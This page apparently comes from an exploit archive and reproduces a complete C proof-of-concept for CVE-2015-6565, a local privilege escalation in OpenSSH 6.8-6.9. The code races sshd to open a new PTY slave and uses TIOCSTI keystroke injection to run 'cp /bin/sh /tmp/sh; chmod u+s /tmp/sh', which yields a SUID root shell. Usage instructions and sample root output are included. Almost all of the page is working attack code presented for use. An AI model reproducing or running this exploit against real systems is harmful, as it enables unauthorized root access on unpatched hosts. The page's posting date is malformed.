OpenSSH 6.8-6.9 local privilege escalation
Posted on 30 November -0001
<HTML><HEAD><TITLE>OpenSSH 6.8-6.9 local privilege escalation</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>/* * not_an_sshnuke.c * * Federico Bento * * up201407890 () alunos dcc fc up pt * https://twitter.com/uid1000 * * OpenSSH 6.8-6.9 local privilege escalation - CVE-2015-6565 * * Considered mostly to be a "DoS", turns out to be a priv esc vuln. * https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6565 * * Shoutz to Jann Horn for the detailed analysis * And also to all my elite colleagues, specially xSTF :) * * * $ gcc not_an_sshnuke.c -o not_an_sshnuke * $ ./not_an_sshnuke /dev/pts/3 * [*] Waiting for slave device /dev/pts/3 * [+] Got PTY slave /dev/pts/3 * [+] Making PTY slave the controlling terminal * [+] SUID shell at /tmp/sh * $ /tmp/sh --norc --noprofile -p * # id * euid=0(root) groups=0(root) * */ #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <stdio.h> #include <unistd.h> #include <sys/ioctl.h> int main(int argc, char *argv[]) { char *cmd = "cp /bin/sh /tmp/sh; chmod u+s /tmp/sh "; int pid, pts = -1; if(argc != 2) { fprintf(stderr, "Usage: %s /dev/pts/X ", argv[0]); fprintf(stderr, "Where X is next slave device to be created "); return 1; } if(!access(argv[1], F_OK)) { fprintf(stderr, "[-] %s device already exists ", argv[1]); return 1; } pid = fork(); if(pid < 0) { fprintf(stderr, "[-] fork failed "); return 1; } if(pid == 0) { printf("[*] Waiting for slave device %s ", argv[1]); /* win the race by opening the PTY slave before sshd's child */ while(pts == -1) pts = open(argv[1], O_WRONLY); printf("[+] Got PTY slave %s ", argv[1]); printf("[+] Making PTY slave the controlling terminal "); dup2(pts, 0); dup2(pts, 1); dup2(pts, 2); setsid(); ioctl(0, TIOCSCTTY, 1); while(*cmd) ioctl(0, TIOCSTI, cmd++); } else { wait(NULL); printf("[+] SUID shell at /tmp/sh "); return 0; } } </BODY></HTML>
